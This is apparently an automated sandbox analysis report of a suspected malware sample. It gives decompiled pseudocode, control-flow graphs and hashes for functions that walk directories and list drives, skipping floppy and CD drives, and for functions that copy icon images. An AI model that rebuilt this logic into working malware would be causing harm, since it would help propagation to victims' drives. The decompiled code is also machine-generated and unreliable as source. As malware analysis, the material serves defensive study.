                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 3541575487-438819550
                                                                          • Opcode ID: 7c3ae3db1d7091c66810d0afebbe5bbb80646222bcf65a163e226210ed7e34e0
                                                                          • Instruction ID: e0bf5d45d2763b4aada85c2368977cee553341535aa4efecd7ed3e039fa03a50
                                                                          • Opcode Fuzzy Hash: 7c3ae3db1d7091c66810d0afebbe5bbb80646222bcf65a163e226210ed7e34e0
                                                                          • Instruction Fuzzy Hash: 513188B53005006BD705BF26998295B3799DFC5328B60847FB904EB2C7EA7DDC018E99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405080, Relevance: 4.6, APIs: 3, Instructions: 100fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 71%
                                                                          			E00405080(char __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				struct _WIN32_FIND_DATAA _v336;
				char _v340;
				char _v344;
				signed int _t50;
				signed int _t51;
				int _t53;
				intOrPtr* _t76;
				intOrPtr _t85;
				void* _t96;
				void* _t99;

				_v344 = 0;
				_v340 = 0;
				_v16 = 0;
				_t76 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E004033FC(_v8);
				E004033FC(_v12);
				_push(_t99);
				_push(0x4051db);
				_push( *[fs:eax]);
				 *[fs:eax] = _t99 + 0xfffffeac;
				E00403094(__ecx);
				if(_v8 != 0 &&  *((char*)(_v8 + E0040320C(_v8) - 1)) != 0x5c) {
					E00403214( &_v8, 0x4051f0);
				}
				if(_v12 != 0 &&  *_v12 == 0x5c) {
					E00404728(_v12,  &_v340, 2);
					E0040312C( &_v12, _v340);
				}
				E00403258( &_v16, _v12, _v8);
				_t50 = FindFirstFileA(E0040340C(_v16),  &_v336); // executed
				_t96 = _t50;
				_t51 = _t50 & 0xffffff00 | _t96 != 0x00000000;
				while(_t51 != 0) {
					if((_v336.dwFileAttributes & 0x00000010) <= 0) {
						if( *_t76 != 0) {
							E00403214(_t76, E004051FC);
						}
						_push( *_t76);
						_push(_v8);
						E004031F4( &_v344, 0x104,  &(_v336.cFileName));
						_push(_v344);
						E004032CC();
					}
					_t53 = FindNextFileA(_t96,  &_v336); // executed
					asm("sbb eax, eax");
					_t51 = _t53 + 1;
				}
				FindClose(_t96); // executed
				_pop(_t85);
				 *[fs:eax] = _t85;
				_push(E004051E2);
				E004030B8( &_v344, 2);
				return E004030B8( &_v16, 3);
			}
















                                                                          0x0040508d
                                                                          0x00405093
                                                                          0x00405099
                                                                          0x0040509c
                                                                          0x0040509e
                                                                          0x004050a1
                                                                          0x004050a7
                                                                          0x004050af
                                                                          0x004050b6
                                                                          0x004050b7
                                                                          0x004050bc
                                                                          0x004050bf
                                                                          0x004050c4
                                                                          0x004050cd
                                                                          0x004050e9
                                                                          0x004050e9
                                                                          0x004050f2
                                                                          0x0040510a
                                                                          0x00405118
                                                                          0x00405118
                                                                          0x00405126
                                                                          0x0040513b
                                                                          0x00405140
                                                                          0x00405144
                                                                          0x004051a6
                                                                          0x00405153
                                                                          0x00405158
                                                                          0x00405161
                                                                          0x00405161
                                                                          0x00405166
                                                                          0x00405168
                                                                          0x0040517c
                                                                          0x00405181
                                                                          0x0040518e
                                                                          0x0040518e
                                                                          0x0040519b
                                                                          0x004051a3
                                                                          0x004051a5
                                                                          0x004051a5
                                                                          0x004051ab
                                                                          0x004051b2
                                                                          0x004051b5
                                                                          0x004051b8
                                                                          0x004051c8
                                                                          0x004051da

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
                                                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040519B
                                                                          • FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 524fcd590759a1fbd4d207714f0cb58143cf8f2903c84afd41d3760fe214a385
                                                                          • Instruction ID: 84585f26add88bff0cc2ce1aee7b2e7e5f9eb71f6f66f1e556af33cdfbb1cecb
                                                                          • Opcode Fuzzy Hash: 524fcd590759a1fbd4d207714f0cb58143cf8f2903c84afd41d3760fe214a385
                                                                          • Instruction Fuzzy Hash: ED415070900508AFDB11EF95C885BDEBBB8EF89305F5044FAE404BB291D7389F459E59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004056A7, Relevance: 4.6, APIs: 3, Instructions: 74fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 412 4056a7-4056e7 call 405300 call 403258 call 4044a8 FindFirstFileA call 403094 422 405746-405759 call 404520 412->422 423 4056e9-4056fc call 40536c 412->423 429 405735-40573e FindNextFileA 423->429 430 4056fe-405701 423->430 429->423 433 405740-405741 FindClose 429->433 431 405703-405713 430->431 432 405717-405730 call 402448 call 4045e8 call 40254c 430->432 431->429 437 405715 431->437 432->429 433->422 437->422 437->432
                                                                          C-Code - Quality: 55%
                                                                          			E004056A7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t14;
				CHAR* _t20;
				void* _t21;
				int _t30;
				void* _t41;
				void* _t45;
				void* _t51;
				void* _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				struct _WIN32_FIND_DATAA* _t68;

				_t64 = __esi;
				_t41 = __ebx;
				_t14 = __eax -  *__eax;
				asm("popad");
				_t68 = _t67 + 0xfffffec0;
				_push(0);
				_push(0);
				E00405300(__ecx, __ebx, _t14, _t68, __edi, __esi);
				_pop(_t45);
				E00403258( &(_t68->ftCreationTime), _t45,  *((intOrPtr*)(__ebx + 0x1c)));
				E004044A8();
				_t20 = _t45;
				_push(_t20);
				_t21 = FindFirstFileA(_t20, _t68); // executed
				_t62 = _t21;
				asm("pushfd");
				E00403094(_t68);
				asm("popfd");
				if(_t21 + 1 != 0) {
					do {
						if(E0040536C(_t41, _t41, _t68->dwFileAttributes,  &(_t68->cFileName[4]), _t62, _t64,  *((intOrPtr*)(_t65 + 8))) != 0) {
							asm("jecxz 0x16");
							 *((intOrPtr*)(_t41 + 0x24))(_t68, 1);
							asm("jecxz 0x22");
							asm("loop 0x31");
							_push(E00402448(0x140));
							E004045E8( *((intOrPtr*)(_t41 + 0x18)), _t35);
							_pop(_t60);
							_t51 = 0x140;
							E0040254C(_t68, _t51, _t60);
						}
						_t30 = FindNextFileA(_t62, _t68); // executed
					} while (_t30 != 0);
					FindClose(_t62);
				}
				 *((intOrPtr*)(_t41 + 0x20)) = 0;
				return E00404520( *((intOrPtr*)(_t41 + 0x20)));
			}















                                                                          0x004056a7
                                                                          0x004056a7
                                                                          0x004056a7
                                                                          0x004056a9
                                                                          0x004056aa
                                                                          0x004056b2
                                                                          0x004056b3
                                                                          0x004056b7
                                                                          0x004056c3
                                                                          0x004056c5
                                                                          0x004056ca
                                                                          0x004056cf
                                                                          0x004056d2
                                                                          0x004056d5
                                                                          0x004056da
                                                                          0x004056df
                                                                          0x004056e0
                                                                          0x004056e5
                                                                          0x004056e7
                                                                          0x004056e9
                                                                          0x004056fc
                                                                          0x00405701
                                                                          0x0040570f
                                                                          0x00405713
                                                                          0x00405715
                                                                          0x00405722
                                                                          0x00405727
                                                                          0x0040572c
                                                                          0x0040572d
                                                                          0x00405730
                                                                          0x00405730
                                                                          0x00405737
                                                                          0x0040573c
                                                                          0x00405741
                                                                          0x00405741
                                                                          0x0040574e
                                                                          0x00405759

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 7e704a9b868fdf1e88b7c0ef0153828458dabf46e2b7cce886aa46cd4968a9f2
                                                                          • Instruction ID: f2b03bfa0ad8d059d80b67f6c6517dce38b4ab09ecbfd790616c6b691a452e24
                                                                          • Opcode Fuzzy Hash: 7e704a9b868fdf1e88b7c0ef0153828458dabf46e2b7cce886aa46cd4968a9f2
                                                                          • Instruction Fuzzy Hash: 0E1181B53005006BD605BB269D8296B3759DBC5328B10843FBA04EB2C7DA3DCC029A99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406D40, Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 551 406d40-406d77 GetLogicalDriveStringsA 552 406dd5-406de1 551->552 553 406de3-406dfb call 403094 552->553 554 406d79-406d91 GetDriveTypeA 552->554 556 406dd2 554->556 557 406d93-406da1 call 40258c 554->557 556->552 557->556 562 406da3-406db1 call 40258c 557->562 562->556 565 406db3-406dcd call 4031b4 call 403214 562->565 565->556
                                                                          C-Code - Quality: 67%
                                                                          			E00406D40(void* __eax, void* __ebx, void* __edi, void* __esi, char _a12245929) {
				char _v155;
				char _v160;
				signed int _t37;
				intOrPtr _t41;
				void* _t45;
				void* _t50;
				void* _t51;

				_t50 = _t51;
				_v160 = 0;
				_t45 = __eax;
				_push(_t50);
				_push(0x406dfc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xffffff64;
				GetLogicalDriveStringsA(0x97,  &_v155); // executed
				_t37 = 0;
				while(_a12245929 != 0) {
					_t48 = _t37 & 0x000000ff;
					if(GetDriveTypeA(_t50 + (_t37 & 0x000000ff) - 0x97) != 5 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x41 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x42) {
						E004031B4();
						E00403214(_t45, _v160);
					}
					_t37 = _t37 + 4;
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00406E03);
				return E00403094( &_v160);
			}










                                                                          0x00406d41
                                                                          0x00406d4e
                                                                          0x00406d54
                                                                          0x00406d58
                                                                          0x00406d59
                                                                          0x00406d5e
                                                                          0x00406d61
                                                                          0x00406d70
                                                                          0x00406d75
                                                                          0x00406dd5
                                                                          0x00406d7b
                                                                          0x00406d91
                                                                          0x00406dc0
                                                                          0x00406dcd
                                                                          0x00406dcd
                                                                          0x00406dd2
                                                                          0x00406dd2
                                                                          0x00406de5
                                                                          0x00406de8
                                                                          0x00406deb
                                                                          0x00406dfb

                                                                          APIs
                                                                          • GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                          • GetDriveTypeA.KERNEL32(00000000), ref: 00406D89
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Drive$LogicalStringsType
                                                                          • String ID:
                                                                          • API String ID: 1630765265-0
                                                                          • Opcode ID: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                          • Instruction ID: e1e1b0806745e30ff5eb453561950d2c3ef676df74625b4c39c06a75345551cd
                                                                          • Opcode Fuzzy Hash: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                          • Instruction Fuzzy Hash: 301159725181089EE720BE759C52BAA7FADDF45304F4644F7AA0DB32C3D9384D128A28
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404F6C, Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 569 404f6c-404f7a FindFirstFileA 570 404f87-404f8d 569->570 571 404f7c-404f83 FindClose 569->571 571->570
                                                                          C-Code - Quality: 100%
                                                                          			E00404F6C(CHAR* __eax) {
				intOrPtr _v288;
				void* _t3;
				void* _t4;
				struct _WIN32_FIND_DATAA* _t8;

				_t3 = FindFirstFileA(__eax, _t8); // executed
				_t4 = _t3 + 1;
				if(_t4 != 0) {
					FindClose(_t4 - 1); // executed
					return _v288;
				}
				return _t4;
			}







                                                                          0x00404f74
                                                                          0x00404f79
                                                                          0x00404f7a
                                                                          0x00404f7e
                                                                          0x00000000
                                                                          0x00404f83
                                                                          0x00404f8d

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(?,?,0040818B,00000000,00408220), ref: 00404F74
                                                                          • FindClose.KERNEL32(00000000,?,?,0040818B,00000000,00408220), ref: 00404F7E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1190363965.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1190168263.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.1191508962.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_$RUX313H.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 66901251027beccf77baa5ce98e67b536316a538da170c98b5b2277659282e4c
                                                                          • Instruction ID: 35bd28bbec0286cbaf15e580cccf41787655d5f9f594f83c1a320a5651e29ebc
                                                                          • Opcode Fuzzy Hash: 66901251027beccf77baa5ce98e67b536316a538da170c98b5b2277659282e4c
                                                                          • Instruction Fuzzy Hash: B8C08CE480010023C80033AA8C06A27204CBAC0358F88092A7BA8F72C3C93E891040AE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00406638, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 409COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 406638-406663 1 406665 0->1 2 406668-40667f call 40598c 0->2 1->2 5 406685-4066c7 call 40456c call 405fd8 * 2 2->5 6 406b1c-406b25 2->6 13 406877-40687e 5->13 14 4066cd-4066d4 5->14 15 406884-406892 13->15 16 406aeb-406b10 call 404520 * 3 13->16 17 4066d7-4066e7 14->17 18 406895-4068a5 15->18 19 4066f3-406713 GetObjectA 17->19 20 4066e9-4066ed 17->20 22 4068b1-4068ed GetObjectA call 402660 18->22 23 4068a7-4068ab 18->23 25 406724-40673d call 402660 19->25 26 406715-40671f GetObjectA 19->26 20->13 20->19 33 4068f6-406912 call 40465c 22->33 34 4068ef-4068f3 22->34 23->16 23->22 36 406748-40675c CopyImage call 4061e0 25->36 37 40673f-406743 25->37 26->25 48 406923-40695c call 4065cc call 406624 call 40598c 33->48 49 406914-40691f call 406580 33->49 34->33 45 406761-406796 call 402660 call 406154 GetObjectA 36->45 40 406801-406858 call 4045e8 call 4065cc call 406598 call 406624 call 40598c 37->40 90 406864-406871 40->90 91 40685a-40685f call 402bec 40->91 62 4067b1-4067c5 45->62 63 406798-40679d 45->63 75 406968-40696a 48->75 76 40695e-406963 call 402bec 48->76 49->48 67 4067d7-4067dd 62->67 68 4067c7-4067d5 call 406218 62->68 63->62 66 40679f-4067af 63->66 66->40 73 4067ef-4067fd call 406218 67->73 74 4067df-4067ed call 406218 67->74 68->40 73->40 74->40 83 406970-40698d CopyImage call 4061e0 75->83 84 4069f4-406a12 CopyImage call 4061e0 call 406218 75->84 76->6 96 4069a0-4069a3 83->96 97 40698f 83->97 101 406a17-406a1e 84->101 90->13 90->17 91->6 99 4069a5-4069a8 96->99 100 4069dc-4069e6 call 406218 96->100 102 4069d0-4069da call 406218 97->102 103 406991-406992 97->103 105 4069e8-4069f2 call 406218 99->105 106 4069aa 99->106 100->101 107 406a20-406a47 call 40598c 101->107 108 406a89-406ad2 CopyImage call 4061e0 call 406218 call 406624 call 40598c call 406624 101->108 102->101 110 406994-406997 103->110 111 4069ac-4069b6 call 406218 103->111 105->101 106->101 129 406a53-406a7d call 4065cc call 40598c call 4065cc 107->129 130 406a49-406a4e call 402bec 107->130 149 406ad4-406ad9 call 402bec 108->149 150 406adb-406ae5 108->150 118 4069b8-4069c2 call 406218 110->118 119 406999-40699c 110->119 111->101 118->101 120 4069c4-4069ce call 406218 119->120 121 40699e 119->121 120->101 121->101 129->108 148 406a7f-406a84 call 402bec 129->148 130->6 148->6 149->6 150->16 150->18
                                                                          C-Code - Quality: 78%
                                                                          			E00406638(void** __eax, intOrPtr __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v14;
				char _v17;
				signed int _v18;
				char _v19;
				int _v20;
				void** _v24;
				unsigned int _v28;
				intOrPtr _v32;
				char _v33;
				int _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed short _v58;
				short _v60;
				short _v62;
				intOrPtr _v68;
				void* _v72;
				void** _v76;
				void** _v80;
				intOrPtr _v100;
				signed short _v106;
				short _v108;
				int _v112;
				int _v116;
				char _v120;
				short _v126;
				intOrPtr _v128;
				int _v136;
				int _v140;
				void _v144;
				void* __ebp;
				signed int _t138;
				signed int _t139;
				void* _t141;
				unsigned int _t152;
				void* _t154;
				void* _t162;
				void* _t179;
				void* _t181;
				void* _t199;
				void* _t201;
				void* _t207;
				void* _t212;
				void* _t214;
				signed int _t220;
				void* _t221;
				void* _t229;
				void* _t232;
				void* _t243;
				void* _t255;
				intOrPtr _t264;
				void* _t274;
				void* _t275;
				int _t293;
				int _t294;
				intOrPtr _t318;
				void* _t324;
				void* _t366;
				void* _t369;
				int _t375;
				int _t376;
				void* _t378;
				void* _t380;
				intOrPtr _t381;

				_t378 = _t380;
				_t381 = _t380 + 0xffffff74;
				_v32 = __ecx;
				_v28 = __edx;
				_v24 = __eax;
				_v33 = 0;
				_v62 = 0;
				_v60 = 1;
				_t138 = _v28 + 1;
				_t139 = _t138 >> 1;
				if(_t138 < 0) {
					asm("adc eax, 0x0");
				}
				_v58 = _t139;
				_t141 = E0040598C(_v32);
				_t384 = _t141 - 6;
				if(_t141 != 6) {
					L59:
					return _v33;
				} else {
					_v44 = ((_v58 & 0x0000ffff) << 4) + 6;
					_v68 = E0040456C();
					_v52 = E00405FD8(0, 0, _t384);
					_v56 = E00405FD8(0, 0, _t384);
					_push(_t378);
					_push(0x406b11);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t381;
					_t152 = _v28 >> 1;
					if(_t152 < 0) {
						L22:
						_t154 = _v28 >> 1;
						__eflags = _t154;
						if(_t154 < 0) {
							L57:
							__eflags = 0;
							_pop(_t318);
							 *[fs:eax] = _t318;
							_push(E00406B18);
							E00404520(_v68);
							E00404520(_v52);
							return E00404520(_v56);
						} else {
							_t162 = _t154 + 1;
							__eflags = _t162;
							_v72 = _t162;
							_v40 = 0;
							_v80 = _v24;
							do {
								_t366 =  *_v80;
								_v48 = _v80[1];
								__eflags = _t366;
								if(_t366 != 0) {
									L26:
									GetObjectA(_v48, 0x18,  &_v144);
									_t293 = _v140;
									_t375 = _v136;
									E00402660( &_v120, 0x28);
									_v120 = 0x28;
									_v116 = _t293;
									_v112 = _t375;
									__eflags = _t366;
									if(_t366 != 0) {
										_t243 = _t293 + _t293;
										__eflags = _t243;
										_v112 = _t243;
									}
									_v108 = 1;
									_v18 = E0040465C(_v68, _v40);
									__eflags = _v14;
									if(_v14 == 0) {
										_v14 = E00406580(_v18 & 0x0000ffff);
									}
									_v106 = _v14;
									_push(E004065CC(_t293, _t375, _t378) + 0x28);
									_t179 = E00406624(_t293, _t375);
									_pop(_t324);
									_v100 = _t324 + _t179;
									_t181 = E0040598C(_v32);
									__eflags = _t181 - 0x28;
									if(_t181 == 0x28) {
										__eflags = _t366;
										if(__eflags == 0) {
											E004061E0(_v52, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
											E00406218(_v52, 0x28, 1, _t378, __eflags);
										} else {
											E004061E0(_v52, CopyImage(_t366, 0, _t293, _t375, 0), __eflags);
											_t220 = _v106 & 0x0000ffff;
											__eflags = _t220 - 0x10;
											if(__eflags > 0) {
												_t221 = _t220 - 0x18;
												__eflags = _t221;
												if(__eflags == 0) {
													E00406218(_v52, 0x28, 6, _t378, __eflags);
												} else {
													__eflags = _t221 - 8;
													if(__eflags == 0) {
														E00406218(_v52, 0x28, 7, _t378, __eflags);
													}
												}
											} else {
												if(__eflags == 0) {
													E00406218(_v52, 0x28, 5, _t378, __eflags);
												} else {
													_t229 = _t220 - 1;
													__eflags = _t229;
													if(__eflags == 0) {
														E00406218(_v52, 0x28, 1, _t378, __eflags);
													} else {
														_t232 = _t229 - 3;
														__eflags = _t232;
														if(__eflags == 0) {
															E00406218(_v52, 0x28, 2, _t378, __eflags);
														} else {
															__eflags = _t232 - 4;
															if(__eflags == 0) {
																E00406218(_v52, 0x28, 3, _t378, __eflags);
															}
														}
													}
												}
											}
										}
										__eflags =  *(_v52 + 0x41);
										if(__eflags == 0) {
											L54:
											E004061E0(_v56, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
											E00406218(_v56, 0x28, 1, _t378, __eflags);
											E00406624(_t293, _t375);
											_t199 = E0040598C(_v32);
											_t201 = E00406624(_t293, _t375);
											__eflags = _t199 - _t201;
											if(_t199 == _t201) {
												goto L56;
											} else {
												E00402BEC();
												goto L59;
											}
										} else {
											_t207 = E0040598C(_v32);
											__eflags = _t207 - (_v18 & 0x0000ffff) << 2;
											if(_t207 == (_v18 & 0x0000ffff) << 2) {
												E004065CC(_t293, _t375, _t378);
												_t212 = E0040598C(_v32);
												_t214 = E004065CC(_t293, _t375, _t378);
												_pop(0x28);
												__eflags = _t212 - _t214;
												if(__eflags == 0) {
													goto L54;
												} else {
													E00402BEC();
													goto L59;
												}
											} else {
												E00402BEC();
												goto L59;
											}
										}
									} else {
										E00402BEC();
										goto L59;
									}
								} else {
									__eflags = _v48;
									if(_v48 == 0) {
										goto L57;
									} else {
										goto L26;
									}
								}
								goto L60;
								L56:
								_v40 = _v40 + 1;
								_v80 =  &(_v80[2]);
								_t130 =  &_v72;
								 *_t130 = _v72 - 1;
								__eflags =  *_t130;
							} while ( *_t130 != 0);
							goto L57;
						}
					} else {
						_v72 = _t152 + 1;
						_v76 = _v24;
						while(1) {
							_t369 =  *_v76;
							_v48 = _v76[1];
							if(_t369 == 0 && _v48 == 0) {
								goto L22;
							}
							GetObjectA(_v48, 0x18,  &_v144);
							_t294 = _v140;
							_t376 = _v136;
							if(_t369 != 0) {
								GetObjectA(_t369, 0x18,  &_v144);
							}
							E00402660( &_v20, 0x10);
							_v20 = _t294;
							_v19 = _t376;
							if(_t369 != 0) {
								_t255 = CopyImage(_t369, 0, _t294, _t376, 0x2000); // executed
								E004061E0(_v52, _t255, __eflags);
								E00402660( &_v120, 0x28);
								_v120 = 0x28;
								GetObjectA(E00406154(_v52, __eflags), 0x18,  &_v144);
								_t264 = _v128;
								__eflags = _t264 - 1;
								if(_t264 != 1) {
									L14:
									_t310 = _v126;
									__eflags = 1 - 0x10;
									if(1 >= 0x10) {
										__eflags = 1 - 0x100;
										if(1 >= 0x100) {
											E00406218(_v52, _t310, 3, _t378, 1 - 0x100);
											_v18 = 0;
											_v17 = 1;
										} else {
											E00406218(_v52, _t310, 2, _t378, 1 - 0x100);
											_v18 = 0x10;
										}
									} else {
										E00406218(_v52, _t310, 1, _t378, 1 - 0x10);
										_v18 = 2;
									}
								} else {
									__eflags = _v126 - 0xf;
									if(_v126 < 0xf) {
										goto L14;
									} else {
										_v18 = 0;
										_v17 = 0;
										_v14 = _v126;
									}
								}
							} else {
								_v18 = 2;
							}
							E004045E8(_v68, 0xbadbad);
							_t274 = E004065CC(_t294, _t376, _t378);
							_t275 = E00406598(_t378);
							_v12 = _t274 + _t275 + 0x28 + E00406624(_t294, _t376);
							_v8 = _v44;
							if(E0040598C(_v32) == 0x10) {
								_v44 = _v44 + _v12;
								_v76 =  &(_v76[2]);
								_t66 =  &_v72;
								 *_t66 = _v72 - 1;
								__eflags =  *_t66;
								if( *_t66 != 0) {
									continue;
								} else {
									goto L22;
								}
							} else {
								E00402BEC();
								goto L59;
							}
							goto L60;
						}
						goto L22;
					}
				}
				L60:
			}







































































                                                                          0x00406639
                                                                          0x0040663b
                                                                          0x00406644
                                                                          0x00406647
                                                                          0x0040664a
                                                                          0x0040664d
                                                                          0x00406651
                                                                          0x00406657
                                                                          0x00406660
                                                                          0x00406661
                                                                          0x00406663
                                                                          0x00406665
                                                                          0x00406665
                                                                          0x00406668
                                                                          0x00406677
                                                                          0x0040667c
                                                                          0x0040667f
                                                                          0x00406b1c
                                                                          0x00406b25
                                                                          0x00406685
                                                                          0x0040668f
                                                                          0x00406697
                                                                          0x004066a3
                                                                          0x004066af
                                                                          0x004066b4
                                                                          0x004066b5
                                                                          0x004066ba
                                                                          0x004066bd
                                                                          0x004066c3
                                                                          0x004066c7
                                                                          0x00406877
                                                                          0x0040687a
                                                                          0x0040687c
                                                                          0x0040687e
                                                                          0x00406aeb
                                                                          0x00406aeb
                                                                          0x00406aed
                                                                          0x00406af0
                                                                          0x00406af3
                                                                          0x00406afb
                                                                          0x00406b03
                                                                          0x00406b10
                                                                          0x00406884
                                                                          0x00406884
                                                                          0x00406884
                                                                          0x00406885
                                                                          0x00406888
                                                                          0x00406892
                                                                          0x00406895
                                                                          0x00406898
                                                                          0x004068a0
                                                                          0x004068a3
                                                                          0x004068a5
                                                                          0x004068b1
                                                                          0x004068be
                                                                          0x004068c3
                                                                          0x004068c9
                                                                          0x004068d9
                                                                          0x004068de
                                                                          0x004068e5
                                                                          0x004068e8
                                                                          0x004068eb
                                                                          0x004068ed
                                                                          0x004068f1
                                                                          0x004068f1
                                                                          0x004068f3
                                                                          0x004068f3
                                                                          0x004068f6
                                                                          0x0040690a
                                                                          0x0040690d
                                                                          0x00406912
                                                                          0x0040691f
                                                                          0x0040691f
                                                                          0x00406927
                                                                          0x00406939
                                                                          0x0040693e
                                                                          0x00406943
                                                                          0x00406946
                                                                          0x00406954
                                                                          0x00406959
                                                                          0x0040695c
                                                                          0x00406968
                                                                          0x0040696a
                                                                          0x00406a08
                                                                          0x00406a12
                                                                          0x00406970
                                                                          0x00406981
                                                                          0x00406986
                                                                          0x0040698a
                                                                          0x0040698d
                                                                          0x004069a0
                                                                          0x004069a0
                                                                          0x004069a3
                                                                          0x004069e1
                                                                          0x004069a5
                                                                          0x004069a5
                                                                          0x004069a8
                                                                          0x004069ed
                                                                          0x004069ed
                                                                          0x004069a8
                                                                          0x0040698f
                                                                          0x0040698f
                                                                          0x004069d5
                                                                          0x00406991
                                                                          0x00406991
                                                                          0x00406991
                                                                          0x00406992
                                                                          0x004069b1
                                                                          0x00406994
                                                                          0x00406994
                                                                          0x00406994
                                                                          0x00406997
                                                                          0x004069bd
                                                                          0x00406999
                                                                          0x00406999
                                                                          0x0040699c
                                                                          0x004069c9
                                                                          0x004069c9
                                                                          0x0040699c
